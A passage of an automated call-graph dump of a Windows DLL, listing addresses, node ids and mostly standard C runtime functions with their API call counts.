6f9e10c5 __DllMainCRTStartup@12 70 API calls 13997->14002 14001 6f9e1456 __DllMainCRTStartup@12 4 API calls 13998->14001 14004 6f9e32d8 __DllMainCRTStartup@12 39 API calls 13999->14004 14014 6f9e2c07 __DllMainCRTStartup@12 14001->14014 14005 6f9e2b9a 76C9D120 14002->14005 14016 6f9e32d8 __DllMainCRTStartup@12 39 API calls 14005->14016 14008 6f9e2b33 14006->14008 14010 6f9e32d8 __DllMainCRTStartup@12 39 API calls 14008->14010 14011 6f9e2b3f 14010->14011 14015 6f9e14e7 __DllMainCRTStartup@12 SysFreeString 14014->14015 14018 6f9e2c37 14015->14018 14019 6f9e2bcb 14016->14019 14021 6f9e2c4a __DllMainCRTStartup@12 14018->14021 14023 6f9e10c5 __DllMainCRTStartup@12 70 API calls 14018->14023 14022 6f9e32d8 __DllMainCRTStartup@12 39 API calls 14019->14022 14023->14021 15363 6f9ecd5b 14137->15363 14140 6f9e2065 14143 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14140->14143 14145 6f9e1fa3 14143->14145 14145->13770 14149 6f9ecd5b __DllMainCRTStartup@12 42 API calls 14150 6f9e208f ___std_exception_copy 14149->14150 15391 6f9edb99 14150->15391 14152 6f9e20bb __DllMainCRTStartup@12 15394 6f9ecb0d 14152->15394 14155 6f9ed5ab ___std_exception_destroy 14 API calls 14156 6f9e2129 __fread_nolock __DllMainCRTStartup@12 14155->14156 14156->14140 14157 6f9ecb0d __DllMainCRTStartup@12 42 API calls 14156->14157 14158 6f9e219c 14157->14158 14159 6f9ed5ab ___std_exception_destroy 14 API calls 14158->14159 14160 6f9e21aa 14159->14160 14160->14140 14161 6f9ecd5b __DllMainCRTStartup@12 42 API calls 14160->14161 14164 6f9e21e5 __fread_nolock __DllMainCRTStartup@12 14161->14164 14162 6f9e239e 14162->14140 14163 6f9ecec7 __DllMainCRTStartup@12 69 API calls 14162->14163 14163->14140 14164->14140 14164->14162 14165 6f9ecb0d __DllMainCRTStartup@12 42 API calls 14164->14165 14166 6f9e227e 14165->14166 14167 6f9ed5ab ___std_exception_destroy 14 API calls 14166->14167 14168 6f9e2290 __fread_nolock __DllMainCRTStartup@12 14167->14168 14169 6f9ecb0d __DllMainCRTStartup@12 42 API calls 14168->14169 14170 6f9e22f5 14169->14170 14171 6f9ed5ab ___std_exception_destroy 14 API calls 14170->14171 14172 6f9e2307 ___std_exception_copy __DllMainCRTStartup@12 14171->14172 14173 6f9ed5ab ___std_exception_destroy 14 API calls 14172->14173 14174 6f9e2371 14173->14174 15400 6f9ed4df 14174->15400 14181 6f9e34ca __DllMainCRTStartup@12 39 API calls 14180->14181 14182 6f9e32e7 __DllMainCRTStartup@12 14181->14182 14182->13766 14184 6f9e4ade IsProcessorFeaturePresent 14183->14184 14185 6f9e4add 14183->14185 14187 6f9e4f19 14184->14187 14185->13772 15940 6f9e4edc SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 14187->15940 14189 6f9e4ffc 14189->13772 14191 6f9e104e __vfwprintf_l 14190->14191 14194 6f9ec76c 14191->14194 14195 6f9ec780 __vfwprintf_l 14194->14195 14200 6f9e85e0 14195->14200 14201 6f9e860f 14200->14201 14202 6f9e85ec 14200->14202 14206 6f9e8636 14201->14206 14223 6f9e83be 14201->14223 14214 6f9ede7c 14202->14214 14204 6f9ede7c __vfwprintf_l 29 API calls 14207 6f9e8607 14204->14207 14206->14204 14206->14207 14208 6f9e7d4e 14207->14208 14209 6f9e7d5a 14208->14209 14210 6f9e7d71 14209->14210 14211 6f9e8197 __vfwprintf_l 39 API calls 14209->14211 14212 6f9e8197 __vfwprintf_l 39 API calls 14210->14212 14213 6f9e1058 14210->14213 14211->14210 14212->14213 14213->13773 14215 6f9ede8c 14214->14215 14216 6f9ede93 14214->14216 14234 6f9e8151 GetLastError 14215->14234 14220 6f9edea1 14216->14220 14238 6f9edcd4 14216->14238 14219 6f9edec8 14219->14220 14241 6f9edf26 IsProcessorFeaturePresent 14219->14241 14220->14207 14222 6f9edef8 14224 6f9e840d 14223->14224 14225 6f9e83ea 14223->14225 14224->14225 14229 6f9e8415 __DllMainCRTStartup@12 14224->14229 14226 6f9ede7c __vfwprintf_l 29 API calls 14225->14226 14227 6f9e8402 14226->14227 14228 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14227->14228 14230 6f9e853f 14228->14230 14376 6f9ea9ff 14229->14376 14230->14206 14235 6f9e816a 14234->14235 14245 6f9ef699 14235->14245 14239 6f9edcdf GetLastError SetLastError 14238->14239 14240 6f9edcf8 14238->14240 14239->14219 14240->14219 14242 6f9edf32 14241->14242 14370 6f9edcfd 14242->14370 14246 6f9ef6ac 14245->14246 14247 6f9ef6b2 14245->14247 14267 6f9f1930 14246->14267 14251 6f9e8182 SetLastError 14247->14251 14272 6f9f196f 14247->14272 14251->14216 14254 6f9ef6f9 14257 6f9f196f __dosmaperr 6 API calls 14254->14257 14255 6f9ef6e4 14256 6f9f196f __dosmaperr 6 API calls 14255->14256 14258 6f9ef6f0 14256->14258 14259 6f9ef705 14257->14259 14284 6f9f0444 14258->14284 14260 6f9ef718 14259->14260 14261 6f9ef709 14259->14261 14290 6f9ef299 14260->14290 14263 6f9f196f __dosmaperr 6 API calls 14261->14263 14263->14258 14266 6f9f0444 ___free_lconv_mon 14 API calls 14266->14251 14295 6f9f17ce 14267->14295 14269 6f9f194c 14270 6f9f1967 TlsGetValue 14269->14270 14271 6f9f1955 14269->14271 14271->14247 14273 6f9f17ce __dosmaperr 5 API calls 14272->14273 14274 6f9f198b 14273->14274 14275 6f9f19a9 TlsSetValue 14274->14275 14276 6f9ef6cc 14274->14276 14276->14251 14277 6f9f1658 14276->14277 14282 6f9f1665 __dosmaperr 14277->14282 14278 6f9f16a5 14312 6f9f0431 14278->14312 14279 6f9f1690 RtlAllocateHeap 14280 6f9ef6dc 14279->14280 14279->14282 14280->14254 14280->14255 14282->14278 14282->14279 14309 6f9edf8f 14282->14309 14285 6f9f044f HeapFree 14284->14285 14289 6f9f0479 14284->14289 14286 6f9f0464 GetLastError 14285->14286 14285->14289 14287 6f9f0471 __dosmaperr 14286->14287 14288 6f9f0431 __dosmaperr 12 API calls 14287->14288 14288->14289 14289->14251 14344 6f9ef12d 14290->14344 14296 6f9f17fe 14295->14296 14297 6f9f17fa __dosmaperr 14295->14297 14296->14297 14301 6f9f1703 14296->14301 14297->14269 14300 6f9f1818 GetProcAddress 14300->14297 14307 6f9f1714 ___vcrt_FlsSetValue 14301->14307 14302 6f9f17aa 14302->14297 14302->14300 14303 6f9f1732 LoadLibraryExW 14304 6f9f174d GetLastError 14303->14304 14305 6f9f17b1 14303->14305 14304->14307 14305->14302 14306 6f9f17c3 FreeLibrary 14305->14306 14306->14302 14307->14302 14307->14303 14308 6f9f1780 LoadLibraryExW 14307->14308 14308->14305 14308->14307 14315 6f9edfbb 14309->14315 14321 6f9ef5e8 GetLastError 14312->14321 14314 6f9f0436 14314->14280 14316 6f9edfc7 ___scrt_is_nonwritable_in_current_image 14315->14316 14317 6f9f351f __FrameHandler3::FrameUnwindToState RtlEnterCriticalSection 14316->14317 14318 6f9edfd2 __FrameHandler3::FrameUnwindToState 14317->14318 14319 6f9ee009 __dosmaperr RtlLeaveCriticalSection 14318->14319 14320 6f9edf9a 14319->14320 14320->14282 14322 6f9ef5fe 14321->14322 14323 6f9ef604 14321->14323 14325 6f9f1930 __dosmaperr 6 API calls 14322->14325 14324 6f9f196f __dosmaperr 6 API calls 14323->14324 14327 6f9ef608 SetLastError 14323->14327 14326 6f9ef620 14324->14326 14325->14323 14326->14327 14329 6f9f1658 __dosmaperr 12 API calls 14326->14329 14327->14314 14330 6f9ef635 14329->14330 14331 6f9ef64e 14330->14331 14332 6f9ef63d 14330->14332 14334 6f9f196f __dosmaperr 6 API calls 14331->14334 14333 6f9f196f __dosmaperr 6 API calls 14332->14333 14335 6f9ef64b 14333->14335 14336 6f9ef65a 14334->14336 14339 6f9f0444 ___free_lconv_mon 12 API calls 14335->14339 14337 6f9ef65e 14336->14337 14338 6f9ef675 14336->14338 14341 6f9f196f __dosmaperr 6 API calls 14337->14341 14340 6f9ef299 __dosmaperr 12 API calls 14338->14340 14339->14327 14342 6f9ef680 14340->14342 14341->14335 14343 6f9f0444 ___free_lconv_mon 12 API calls 14342->14343 14343->14327 14345 6f9ef139 ___scrt_is_nonwritable_in_current_image 14344->14345 14358 6f9f351f RtlEnterCriticalSection 14345->14358 14347 6f9ef143 14359 6f9ef173 14347->14359 14350 6f9ef23f 14351 6f9ef24b ___scrt_is_nonwritable_in_current_image 14350->14351 14362 6f9f351f RtlEnterCriticalSection 14351->14362 14353 6f9ef255 14363 6f9ef420 14353->14363 14355 6f9ef26d 14367 6f9ef28d 14355->14367 14358->14347 14360 6f9f3567 __FrameHandler3::FrameUnwindToState RtlLeaveCriticalSection 14359->14360 14361 6f9ef161 14360->14361 14361->14350 14362->14353 14364 6f9ef456 __dosmaperr 14363->14364 14365 6f9ef42f __dosmaperr 14363->14365 14364->14355 14365->14364 14366 6f9f53c5 __dosmaperr 14 API calls 14365->14366 14366->14364 14368 6f9f3567 __FrameHandler3::FrameUnwindToState RtlLeaveCriticalSection 14367->14368 14369 6f9ef27b 14368->14369 14369->14266 14371 6f9edd19 __fread_nolock __FrameHandler3::FrameUnwindToState 14370->14371 14372 6f9edd45 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 14371->14372 14373 6f9ede16 __FrameHandler3::FrameUnwindToState 14372->14373 14374 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14373->14374 14375 6f9ede34 GetCurrentProcess TerminateProcess 14374->14375 14375->14222 14388 6f9ec3ce 14376->14388 14378 6f9e8496 14385 6f9ea12f 14378->14385 14379 6f9ede7c __vfwprintf_l 29 API calls 14379->14378 14380 6f9eaa1f 14380->14379 14381 6f9eaa14 __DllMainCRTStartup@12 14381->14378 14381->14380 14392 6f9ea3f1 14381->14392 14395 6f9eaef1 14381->14395 14436 6f9eb71c 14381->14436 14386 6f9f0444 ___free_lconv_mon 14 API calls 14385->14386 14387 6f9ea13f 14386->14387 14387->14227 14389 6f9ec3f2 14388->14389 14390 6f9ec3d9 14388->14390 14389->14381 14391 6f9ede7c __vfwprintf_l 29 API calls 14390->14391 14391->14389 14472 6f9e8a8b 14392->14472 14394 6f9ea42e 14394->14381 14396 6f9eaeff 14395->14396 14397 6f9eaf17 14395->14397 14399 6f9eaf58 14396->14399 14400 6f9eb74a 14396->14400 14401 6f9eb7b4 14396->14401 14398 6f9ede7c __vfwprintf_l 29 API calls 14397->14398 14397->14399 14402 6f9eaf4c 14398->14402 14399->14381 14405 6f9eb7dc 14400->14405 14406 6f9eb750 14400->14406 14403 6f9eb7b9 14401->14403 14404 6f9eb7f3 14401->14404 14402->14381 14407 6f9eb7ea 14403->14407 14408 6f9eb7bb 14403->14408 14409 6f9eb7f8 14404->14409 14410 6f9eb812 14404->14410 14524 6f9e9528 14405->14524 14411 6f9eb755 14406->14411 14412 6f9eb781 14406->14412 14531 6f9ec141 14407->14531 14413 6f9eb763 14408->14413 14424 6f9eb7ca 14408->14424 14414 6f9eb809 14409->14414 14417 6f9eb7fd 14409->14417 14539 6f9ec174 14410->14539 14411->14414 14418 6f9eb75b 14411->14418 14412->14418 14421 6f9eb7a9 14412->14421 14434 6f9eb81d __DllMainCRTStartup@12 14413->14434 14497 6f9ebdbb 14413->14497 14535 6f9ec1fc 14414->14535 14417->14405 14417->14421 14418->14413 14425 6f9eb78e 14418->14425 14431 6f9eb77c __DllMainCRTStartup@12 14418->14431 14421->14434 14513 6f9e9847 14421->14513 14424->14405 14426 6f9eb7ce 14424->14426 14425->14434 14507 6f9ebff7 14425->14507 14426->14434 14520 6f9ec09f 14426->14520 14428 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14430 6f9ebb0e 14428->14430 14430->14381 14431->14434 14435 6f9eb9fd 14431->14435 14542 6f9ec320 14431->14542 14434->14428 14435->14434 14549 6f9f124b 14435->14549 14437 6f9eb74a 14436->14437 14438 6f9eb7b4 14436->14438 14441 6f9eb7dc 14437->14441 14442 6f9eb750 14437->14442 14439 6f9eb7b9 14438->14439 14440 6f9eb7f3 14438->14440 14443 6f9eb7ea 14439->14443 14444 6f9eb7bb 14439->14444 14445 6f9eb7f8 14440->14445 14446 6f9eb812 14440->14446 14449 6f9e9528 __DllMainCRTStartup@12 30 API calls 14441->14449 14447 6f9eb755 14442->14447 14448 6f9eb781 14442->14448 14450 6f9ec141 __DllMainCRTStartup@12 30 API calls 14443->14450 14451 6f9eb763 14444->14451 14461 6f9eb7ca 14444->14461 14452 6f9eb7fd 14445->14452 14453 6f9eb809 14445->14453 14454 6f9ec174 __DllMainCRTStartup@12 30 API calls 14446->14454 14447->14453 14455 6f9eb75b 14447->14455 14448->14455 14457 6f9eb7a9 14448->14457 14467 6f9eb77c __DllMainCRTStartup@12 14449->14467 14450->14467 14456 6f9ebdbb __DllMainCRTStartup@12 42 API calls 14451->14456 14470 6f9eb81d __DllMainCRTStartup@12 14451->14470 14452->14441 14452->14457 14458 6f9ec1fc __DllMainCRTStartup@12 39 API calls 14453->14458 14454->14467 14455->14451 14459 6f9eb78e 14455->14459 14455->14467 14456->14467 14460 6f9e9847 __DllMainCRTStartup@12 30 API calls 14457->14460 14457->14470 14458->14467 14463 6f9ebff7 __DllMainCRTStartup@12 40 API calls 14459->14463 14459->14470 14460->14467 14461->14441 14462 6f9eb7ce 14461->14462 14466 6f9ec09f __vfwprintf_l 29 API calls 14462->14466 14462->14470 14463->14467 14464 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14465 6f9ebb0e 14464->14465 14465->14381 14466->14467 14468 6f9ec320 __vfwprintf_l 39 API calls 14467->14468 14467->14470 14471 6f9eb9fd 14467->14471 14468->14471 14469 6f9f124b __wsopen_s 40 API calls 14469->14471 14470->14464 14471->14469 14471->14470 14482 6f9ec37b 14472->14482 14474 6f9e8ae9 14480 6f9e8de8 14474->14480 14489 6f9ec2ee 14474->14489 14475 6f9e8ab6 14477 6f9ede7c __vfwprintf_l 29 API calls 14475->14477 14481 6f9e8ad1 __vfwprintf_l 14477->14481 14478 6f9ec2ee __DllMainCRTStartup@12 39 API calls 14478->14481 14480->14478 14481->14394 14483 6f9e8aa1 14482->14483 14484 6f9ec380 14482->14484 14483->14474 14483->14475 14483->14481 14485 6f9f0431 __dosmaperr 14 API calls 14484->14485 14486 6f9ec385 14485->14486 14495 6f9edef9 14486->14495 14490 6f9ec318 14489->14490 14491 6f9ec303 14489->14491 14490->14480 14491->14490 14492 6f9f0431 __dosmaperr 14 API calls 14491->14492 14493 6f9ec30d 14492->14493 14494 6f9edef9 __wsopen_s 39 API calls 14493->14494 14494->14490 14496 6f9ede45 __wsopen_s 39 API calls 14495->14496 14498 6f9ebddc 14497->14498 14561 6f9e86ab 14498->14561 14500 6f9ebe1e __vfwprintf_l 14572 6f9f0f60 14500->14572 14503 6f9ebed4 __vfwprintf_l 14505 6f9ec320 __vfwprintf_l 39 API calls 14503->14505 14506 6f9ebf10 __vfwprintf_l 14503->14506 14504 6f9ec320 __vfwprintf_l 39 API calls 14504->14503 14505->14506 14506->14431 14506->14506 14508 6f9ec024 __DllMainCRTStartup@12 14507->14508 14509 6f9ec040 14508->14509 14510 6f9ec320 __vfwprintf_l 39 API calls 14508->14510 14511 6f9ec061 14508->14511 14512 6f9f124b __wsopen_s 40 API calls 14509->14512 14510->14509 14511->14431 14512->14511 14514 6f9e985c __vfwprintf_l 14513->14514 14515 6f9e987e 14514->14515 14517 6f9e98a5 14514->14517 14516 6f9ede7c __vfwprintf_l 29 API calls 14515->14516 14519 6f9e989b __DllMainCRTStartup@12 14516->14519 14517->14519 14643 6f9e872c 14517->14643 14519->14431 14523 6f9ec0b5 __vfwprintf_l 14520->14523 14521 6f9ede7c __vfwprintf_l 29 API calls 14522 6f9ec0d6 14521->14522 14522->14431 14523->14521 14523->14522 14525 6f9e953d __vfwprintf_l 14524->14525 14526 6f9e9586 14525->14526 14527 6f9e955f 14525->14527 14529 6f9e872c __DllMainCRTStartup@12 15 API calls 14526->14529 14530 6f9e957c __DllMainCRTStartup@12 14526->14530 14528 6f9ede7c __vfwprintf_l 29 API calls 14527->14528 14528->14530 14529->14530 14530->14431 14532 6f9ec14d 14531->14532 14654 6f9e9209 14532->14654 14534 6f9ec15d 14534->14431 14536 6f9ec219 __DllMainCRTStartup@12 14535->14536 14538 6f9ec237 __vfwprintf_l 14536->14538 14661 6f9ec270 14536->14661 14538->14431 14540 6f9e9847 __DllMainCRTStartup@12 30 API calls 14539->14540 14541 6f9ec189 14540->14541 14541->14431 14665 6f9e8197 14542->14665 14550 6f9f125f 14549->14550 14558 6f9f126f 14549->14558 14551 6f9f1294 14550->14551 14552 6f9ec320 __vfwprintf_l 39 API calls 14550->14552 14550->14558 14553 6f9f12c8 14551->14553 14554 6f9f12a5 14551->14554 14552->14551 14556 6f9f1344 14553->14556 14557 6f9f12f0 14553->14557 14553->14558 14709 6f9f77fc 14554->14709 14559 6f9f488b __fread_nolock MultiByteToWideChar 14556->14559 14557->14558 14712 6f9f488b 14557->14712 14558->14435 14559->14558 14562 6f9e86d2 14561->14562 14563 6f9e86c0 14561->14563 14562->14563 14591 6f9f047e 14562->14591 14563->14500 14566 6f9e86fe 14568 6f9f0444 ___free_lconv_mon 14 API calls 14566->14568 14567 6f9e8709 14598 6f9ea149 14567->14598 14568->14563 14571 6f9f0444 ___free_lconv_mon 14 API calls 14571->14563 14573 6f9f0f95 14572->14573 14574 6f9f0f71 14572->14574 14573->14574 14576 6f9f0fc8 __vfwprintf_l 14573->14576 14575 6f9ede7c __vfwprintf_l 29 API calls 14574->14575 14585 6f9ebeb1 14575->14585 14577 6f9f1001 14576->14577 14578 6f9f1030 14576->14578 14601 6f9f0e04 14577->14601 14579 6f9f1059 14578->14579 14580 6f9f105e 14578->14580 14583 6f9f1086 14579->14583 14584 6f9f10c0 14579->14584 14609 6f9f068d 14580->14609 14586 6f9f108b 14583->14586 14587 6f9f10a6 14583->14587 14636 6f9f09ba 14584->14636 14585->14503 14585->14504 14619 6f9f0d35 14586->14619 14629 6f9f0bb1 14587->14629 14592 6f9f04bc 14591->14592 14596 6f9f048c __dosmaperr 14591->14596 14593 6f9f0431 __dosmaperr 14 API calls 14592->14593 14595 6f9e86f6 14593->14595 14594 6f9f04a7 RtlAllocateHeap 14594->14595 14594->14596 14595->14566 14595->14567 14596->14592 14596->14594 14597 6f9edf8f __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 14596->14597 14597->14596 14599 6f9f0444 ___free_lconv_mon 14 API calls 14598->14599 14600 6f9e8714 14599->14600 14600->14571 14602 6f9f0e1a 14601->14602 14603 6f9f0e25 14601->14603 14602->14585 14604 6f9eed88 ___std_exception_copy 39 API calls 14603->14604 14605 6f9f0e80 14604->14605 14606 6f9f0e8a 14605->14606 14607 6f9edf26 __vfwprintf_l 11 API calls 14605->14607 14606->14585 14608 6f9f0e98 14607->14608 14610 6f9f06a0 14609->14610 14611 6f9f06af 14610->14611 14612 6f9f06d1 14610->14612 14613 6f9ede7c __vfwprintf_l 29 API calls 14611->14613 14614 6f9f06e6 14612->14614 14616 6f9f0739 14612->14616 14618 6f9f06c7 __fread_nolock __vfwprintf_l __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem _strrchr 14613->14618 14615 6f9f09ba __vfwprintf_l 41 API calls 14614->14615 14615->14618 14617 6f9ec320 __vfwprintf_l 39 API calls 14616->14617 14616->14618 14617->14618 14618->14585 14620 6f9f612b __vfwprintf_l 41 API calls 14619->14620 14621 6f9f0d65 14620->14621 14622 6f9f5b81 __vfwprintf_l 29 API calls 14621->14622 14623 6f9f0da3 14622->14623 14624 6f9f0de3 14623->14624 14626 6f9f0daa 14623->14626 14627 6f9f0dbc 14623->14627 14625 6f9f0a5e __vfwprintf_l 39 API calls 14624->14625 14625->14626 14626->14585 14628 6f9f0c47 __vfwprintf_l 39 API calls 14627->14628 14628->14626 14630 6f9f612b __vfwprintf_l 41 API calls 14629->14630 14631 6f9f0be0 14630->14631 14632 6f9f5b81 __vfwprintf_l 29 API calls 14631->14632 14633 6f9f0c21 14632->14633 14634 6f9f0c28 14633->14634 14635 6f9f0c47 __vfwprintf_l 39 API calls 14633->14635 14634->14585 14635->14634 14637 6f9f612b __vfwprintf_l 41 API calls 14636->14637 14638 6f9f09e4 14637->14638 14639 6f9f5b81 __vfwprintf_l 29 API calls 14638->14639 14640 6f9f0a32 14639->14640 14641 6f9f0a39 14640->14641 14642 6f9f0a5e __vfwprintf_l 39 API calls 14640->14642 14641->14585 14642->14641 14644 6f9e8753 14643->14644 14653 6f9e8741 14643->14653 14645 6f9f047e __fread_nolock 15 API calls 14644->14645 14644->14653 14646 6f9e8778 14645->14646 14647 6f9e878b 14646->14647 14648 6f9e8780 14646->14648 14650 6f9ea149 __vfwprintf_l 14 API calls 14647->14650 14649 6f9f0444 ___free_lconv_mon 14 API calls 14648->14649 14649->14653 14651 6f9e8796 14650->14651 14652 6f9f0444 ___free_lconv_mon 14 API calls 14651->14652 14652->14653 14653->14519 14655 6f9e921e __vfwprintf_l 14654->14655 14656 6f9e9240 14655->14656 14657 6f9e9267 14655->14657 14658 6f9ede7c __vfwprintf_l 29 API calls 14656->14658 14659 6f9e872c __DllMainCRTStartup@12 15 API calls 14657->14659 14660 6f9e925d __DllMainCRTStartup@12 14657->14660 14658->14660 14659->14660 14660->14534 14662 6f9ec283 14661->14662 14664 6f9ec28a __vfwprintf_l 14661->14664 14663 6f9ec320 __vfwprintf_l 39 API calls 14662->14663 14663->14664 14664->14538 14666 6f9e81aa 14665->14666 14667 6f9e81a1 14665->14667 14672 6f9f04f9 14666->14672 14668 6f9e8151 __vfwprintf_l 16 API calls 14667->14668 14669 6f9e81a6 14668->14669 14669->14666 14680 6f9eed44 14669->14680 14673 6f9ec34d 14672->14673 14674 6f9f0510 14672->14674 14676 6f9f0557 14673->14676 14674->14673 14691 6f9f5611 14674->14691 14677 6f9f056e 14676->14677 14678 6f9ec35a 14676->14678 14677->14678 14704 6f9f455a 14677->14704 14678->14435 14681 6f9f4c7b __FrameHandler3::FrameUnwindToState RtlEnterCriticalSection RtlLeaveCriticalSection 14680->14681 14682 6f9eed49 14681->14682 14683 6f9eed54 14682->14683 14684 6f9f4cc0 __FrameHandler3::FrameUnwindToState 38 API calls 14682->14684 14685 6f9eed5e IsProcessorFeaturePresent 14683->14685 14686 6f9eed7d 14683->14686 14684->14683 14687 6f9eed6a 14685->14687 14688 6f9ee4c9 __FrameHandler3::FrameUnwindToState 21 API calls 14686->14688 14689 6f9edcfd __FrameHandler3::FrameUnwindToState 8 API calls 14687->14689 14690 6f9eed87 14688->14690 14689->14686 14692 6f9f561d ___scrt_is_nonwritable_in_current_image 14691->14692 14693 6f9ef497 _unexpected 39 API calls 14692->14693 14694 6f9f5626 14693->14694 14695 6f9f351f __FrameHandler3::FrameUnwindToState RtlEnterCriticalSection 14694->14695 14701 6f9f566c 14694->14701 14696 6f9f5644 14695->14696 14697 6f9f5692 __vfwprintf_l 14 API calls 14696->14697 14698 6f9f5655 14697->14698 14699 6f9f5671 __vfwprintf_l RtlLeaveCriticalSection 14698->14699 14700 6f9f5668 14699->14700 14700->14701 14702 6f9eed44 __FrameHandler3::FrameUnwindToState 39 API calls 14700->14702 14701->14673 14703 6f9f5691 14702->14703 14705 6f9ef497 _unexpected 39 API calls 14704->14705 14706 6f9f455f 14705->14706 14707 6f9f4472 __vfwprintf_l 39 API calls 14706->14707 14708 6f9f456a 14707->14708 14708->14678 14715 6f9f98ef 14709->14715 14719 6f9f47f3 14712->14719 14718 6f9f991d __vfwprintf_l 14715->14718 14716 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14717 6f9f7817 14716->14717 14717->14558 14718->14716 14720 6f9f4804 MultiByteToWideChar 14719->14720 14720->14558 14722 6f9e110e __vfwprintf_l 14721->14722 14725 6f9ec72b 14722->14725 14726 6f9ec73f __vfwprintf_l 14725->14726 14731 6f9e8541 14726->14731 14729 6f9e7d4e __vfwprintf_l 39 API calls 14730 6f9e1118 14729->14730 14730->13780 14732 6f9e854d 14731->14732 14734 6f9e8570 14731->14734 14733 6f9ede7c __vfwprintf_l 29 API calls 14732->14733 14738 6f9e8568 14733->14738 14737 6f9e8597 14734->14737 14739 6f9e824a 14734->14739 14736 6f9ede7c __vfwprintf_l 29 API calls 14736->14738 14737->14736 14737->14738 14738->14729 14740 6f9e8299 14739->14740 14741 6f9e8276 14739->14741 14740->14741 14744 6f9e82a1 __vfwprintf_l 14740->14744 14742 6f9ede7c __vfwprintf_l 29 API calls 14741->14742 14743 6f9e828e 14742->14743 14745 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14743->14745 14750 6f9ea71b 14744->14750 14746 6f9e83bc 14745->14746 14746->14737 14749 6f9ea12f __vfwprintf_l 14 API calls 14749->14743 14751 6f9ec3ce __DllMainCRTStartup@12 29 API calls 14750->14751 14759 6f9ea735 __vfwprintf_l __DllMainCRTStartup@12 14751->14759 14752 6f9e8322 14752->14749 14753 6f9ede7c __vfwprintf_l 29 API calls 14753->14752 14754 6f9ea740 14754->14753 14757 6f9ec320 __vfwprintf_l 39 API calls 14757->14759 14759->14752 14759->14754 14759->14757 14760 6f9ea844 14759->14760 14764 6f9ea379 14759->14764 14767 6f9ead98 14759->14767 14799 6f9eb3bd 14759->14799 14761 6f9ede7c __vfwprintf_l 29 API calls 14760->14761 14762 6f9ea85e 14761->14762 14763 6f9ede7c __vfwprintf_l 29 API calls 14762->14763 14763->14752 14826 6f9e887c 14764->14826 14766 6f9ea3b4 14766->14759 14768 6f9ead9f 14767->14768 14769 6f9eadb6 14767->14769 14770 6f9eadf5 14768->14770 14771 6f9eb442 14768->14771 14772 6f9eb3e2 14768->14772 14769->14770 14773 6f9ede7c __vfwprintf_l 29 API calls 14769->14773 14770->14759 14775 6f9eb47b 14771->14775 14776 6f9eb447 14771->14776 14777 6f9eb468 14772->14777 14778 6f9eb3e8 14772->14778 14774 6f9eadea 14773->14774 14774->14759 14779 6f9eb498 14775->14779 14780 6f9eb480 14775->14780 14781 6f9eb449 14776->14781 14782 6f9eb474 14776->14782 14863 6f9e939b 14777->14863 14787 6f9eb439 14778->14787 14788 6f9eb3ed 14778->14788 14874 6f9ec15e 14779->14874 14780->14777 14780->14787 14798 6f9eb413 __vfwprintf_l __DllMainCRTStartup@12 14780->14798 14791 6f9eb458 14781->14791 14794 6f9eb3fc 14781->14794 14870 6f9ec124 14782->14870 14787->14798 14856 6f9e96ba 14787->14856 14789 6f9eb426 14788->14789 14788->14794 14788->14798 14789->14798 14852 6f9ebf62 14789->14852 14791->14777 14793 6f9eb45c 14791->14793 14797 6f9ec09f __vfwprintf_l 29 API calls 14793->14797 14793->14798 14794->14798 14842 6f9ebc2a 14794->14842 14795 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14796 6f9eb71a 14795->14796 14796->14759 14797->14798 14798->14795 14800 6f9eb442 14799->14800 14801 6f9eb3e2 14799->14801 14802 6f9eb47b 14800->14802 14803 6f9eb447 14800->14803 14804 6f9eb468 14801->14804 14805 6f9eb3e8 14801->14805 14806 6f9eb498 14802->14806 14807 6f9eb480 14802->14807 14808 6f9eb449 14803->14808 14809 6f9eb474 14803->14809 14813 6f9e939b __vfwprintf_l 30 API calls 14804->14813 14815 6f9eb439 14805->14815 14816 6f9eb3ed 14805->14816 14812 6f9ec15e __vfwprintf_l 30 API calls 14806->14812 14807->14804 14807->14815 14825 6f9eb413 __vfwprintf_l __DllMainCRTStartup@12 14807->14825 14811 6f9eb3fc 14808->14811 14818 6f9eb458 14808->14818 14810 6f9ec124 __vfwprintf_l 30 API calls 14809->14810 14810->14825 14814 6f9ebc2a __vfwprintf_l 42 API calls 14811->14814 14811->14825 14812->14825 14813->14825 14814->14825 14817 6f9e96ba __vfwprintf_l 30 API calls 14815->14817 14815->14825 14816->14811 14819 6f9eb426 14816->14819 14816->14825 14817->14825 14818->14804 14820 6f9eb45c 14818->14820 14821 6f9ebf62 __vfwprintf_l 41 API calls 14819->14821 14819->14825 14824 6f9ec09f __vfwprintf_l 29 API calls 14820->14824 14820->14825 14821->14825 14822 6f9e4ad5 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 14823 6f9eb71a 14822->14823 14823->14759 14824->14825 14825->14822 14827 6f9ec37b __vfwprintf_l 39 API calls 14826->14827 14828 6f9e888e 14827->14828 14829 6f9e88a3 14828->14829 14832 6f9e88d6 14828->14832 14835 6f9e88be __vfwprintf_l 14828->14835 14830 6f9ede7c __vfwprintf_l 29 API calls 14829->14830 14830->14835 14831 6f9e896d 14833 6f9ec2c5 __vfwprintf_l 39 API calls 14831->14833 14832->14831 14836 6f9ec2c5 14832->14836 14833->14835 14835->14766 14837 6f9ec2ea 14836->14837 14838 6f9ec2d6 14836->14838 14837->14831 14838->14837 14839 6f9f0431 __dosmaperr 14 API calls 14838->14839 14840 6f9ec2df 14839->14840 14841 6f9edef9 __wsopen_s 39 API calls 14840->14841 14841->14837 14843 6f9ebc44 14842->14843 14844 6f9e86ab __vfwprintf_l 15 API calls 14843->14844 14845 6f9ebc83 